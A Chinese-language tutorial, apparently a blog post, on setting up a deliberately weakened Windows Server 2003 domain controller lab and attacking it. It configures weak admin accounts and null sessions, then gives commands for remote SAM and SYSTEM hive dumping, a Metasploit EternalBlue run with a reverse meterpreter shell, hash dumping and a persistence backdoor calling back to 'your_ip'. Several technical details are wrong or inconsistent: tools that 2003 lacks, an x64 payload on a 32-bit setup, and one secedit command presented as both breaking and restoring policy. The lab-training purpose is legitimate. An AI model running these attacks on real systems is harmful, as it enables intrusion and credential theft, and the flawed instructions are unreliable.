Windows Server 2003域控靶机搭建与渗透测试实战

1. 项目概述：打造Windows Server 2003域控靶机的核心价值

十年前我第一次接触内网渗透时，导师扔给我一台Windows Server 2003服务器说："把它变成域控，然后攻破它"。这个看似简单的任务让我折腾了整整三天——不是配置出错就是漏洞利用失败。如今虽然有了更新的系统，但2003作为内网渗透的经典训练平台依然不可替代。它就像武术中的木人桩，能让你掌握最本质的攻防原理。

这个靶机环境特别适合以下场景：

• 内网渗透入门：理解域环境基础架构
• 经典协议攻防：SMB/IPC$、NetBIOS等传统协议的利用
• 横向移动训练：在受限环境下练习权限提升和跳板技术
• 老旧系统安全研究：很多企业内网仍存在此类遗留系统

关键提示：本文配置的靶机将开放大量"故意漏洞"，仅限实验环境使用。实际生产环境中必须避免这些配置！

2. 环境准备与系统安装

2.1 虚拟机硬件配置要点

选择VMware Workstation 16 Pro作为虚拟化平台（兼容性最好），具体配置参数需要特别注意：

我曾在实验中尝试给2003分配4GB内存，结果系统反而变得不稳定——这是32位系统的内存管理限制导致的。最佳实践是保持1-2GB区间。

2.2 系统安装的五个关键步骤

1. 镜像选择：

   • 务必使用Windows Server 2003 R2 Enterprise with SP2镜像
   • 验证SHA1：6B6D9E4B728B6CEF8E94FC6B7A70A8641D0D4D6D

2. 分区方案：

   bash复制# 使用diskpart创建分区（安装界面按Shift+F10调出CMD）
   diskpart
   select disk 0
   create partition primary size=20000
   format quick fs=ntfs
   active
   exit
   

3. 管理员密码设置：

   • 强度要求：Admin@123这类包含大小写+数字+特殊字符的组合
   • 渗透测试中处理特殊字符的技巧：

     powershell复制# 在PowerShell中需要用反引号转义
     net user administrator "Admin`@123"
     

4. 网络组件安装：

   • 自定义安装时取消"管理和监视工具"
   • 这是为了避免后期产生干扰服务

5. 首次登录后：

   • 立即运行slmgr -rearm延长试用期
   • 关闭自动更新服务（避免历史补丁干扰实验）

3. 网络配置与域控制器搭建

3.1 静态IP配置的深层原理

在"本地连接"属性中配置TCP/IP时，有几个隐藏要点：

1. DNS指向自己：

   • 域控制器必须运行DNS服务
   • 将首选DNS设为127.0.0.1会导致AD无法正常注册记录
   • 正确做法是设为服务器自身IP（192.168.10.10）

2. NetBIOS over TCP/IP：

   • 必须启用以支持旧版工具扫描
   • 位于"高级TCP/IP设置"-"WINS"标签页

3. 禁用LMHOSTS查询：

   • 在注册表中设置：

     reg复制[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
     "EnableLMHOSTS"=dword:00000000
     

3.2 域控制器提升(dcpromo)实战

运行dcpromo命令后的关键配置项：

1. 域名设计：

   • 使用伪顶级域如.hackepts.com
   • 避免使用.test/.local等保留域

2. 数据库位置：

   • NTDS.dit默认存放在C:\Windows\NTDS
   • 实战中可指定到非系统分区提高安全性

3. 还原模式密码：

   • 这是破解NTLM哈希时的关键凭证
   • 建议与管理员密码不同

4. 权限兼容性：

   mermaid复制graph LR
   A[权限选项] --> B[仅与2000兼容]
   A --> C[与2000和2003兼容]
   A --> D[仅与2003兼容]
   

   选择"与Windows 2000服务器兼容"是为了：

   • 允许NTLMv1认证
   • 启用SMB1协议
   • 这些都是渗透测试的常见突破口

4. 漏洞环境精心配置

4.1 服务漏洞配置清单

4.2 用户账户安全降级

1. Guest账户强化：

   • 将其加入Administrators组
   • 清除"拒绝本地登录"权限

2. 创建弱密码账户：

   powershell复制net user hacker P@ssw0rd /add
   net localgroup administrators hacker /add
   

3. 密码策略破坏：

   powershell复制secedit /configure /db C:\Windows\temp\sec.sdb /cfg C:\Windows\inf\defltbase.inf
   

4.3 注册表关键漏洞项

reg复制Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"restrictanonymous"=dword:00000000
"limitblankpassworduse"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters]
"AutoShareWks"=dword:00000001
"NullSessionPipes"=hex(7):00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"LocalAccountTokenFilterPolicy"=dword:00000001

5. 渗透测试验证方案

5.1 基础连通性测试

bash复制# ICMP测试
ping -c 4 192.168.10.10

# 端口扫描（经典老三样）
nmap -p 135,139,445 -sV -O 192.168.10.10

# SMB枚举
smbmap -H 192.168.10.10 -u '' -p ''

5.2 漏洞利用实战案例

案例1：IPC$空连接利用

bash复制# 建立空会话
net use \\192.168.10.10\IPC$ "" /u:""

# 枚举共享
net view \\192.168.10.10

# 导出SAM数据库
reg save \\192.168.10.10\HKLM\SAM sam.save
reg save \\192.168.10.10\HKLM\SYSTEM system.save

案例2：MS17-010永恒之蓝

bash复制# 使用Metasploit框架
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.10.10
set payload windows/x64/meterpreter/reverse_tcp
exploit

5.3 后渗透阶段操作

获取meterpreter会话后：

bash复制# 转储哈希
hashdump

# 启用RDP
run post/windows/manage/enable_rdp

# 创建持久后门
persistence -U -i 60 -p 443 -r your_ip

6. 故障排除与优化建议

6.1 常见问题解决方案

6.2 性能优化技巧

1. AD数据库维护：

   powershell复制ntdsutil "ac i ntds" "files" "compact to C:\temp" q q
   

2. 日志管理：

   • 将DNS日志移到非系统分区
   • 配置循环日志记录

3. 注册表优化：

   reg复制[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
   "DisablePagingExecutive"=dword:00000001
   

7. 安全加固建议（实验后必做）

完成渗透测试后，应当立即恢复安全配置：

1. 立即操作项：

   powershell复制# 关闭高危服务
   Stop-Service -Name Telnet -Force
   Set-Service -Name Telnet -StartupType Disabled
   
   # 重置本地安全策略
   secedit /configure /db C:\Windows\temp\sec.sdb /cfg C:\Windows\inf\defltbase.inf
   

2. 长期加固方案：

   • 安装所有安全更新（需手动集成SP2后补丁）
   • 启用NTLMv2并禁用LM认证
   • 配置Windows防火墙严格规则

3. 监控措施：

   powershell复制# 启用审核策略
   auditpol /set /category:"Account Logon" /success:enable /failure:enable
   auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
   

经过多年实战，我发现Windows Server 2003域控环境就像一本活的安全教科书。每次重建这个靶机，都能发现新的攻击面和防御思路。建议每隔半年就重新搭建一次，对照最新的渗透技术进行验证。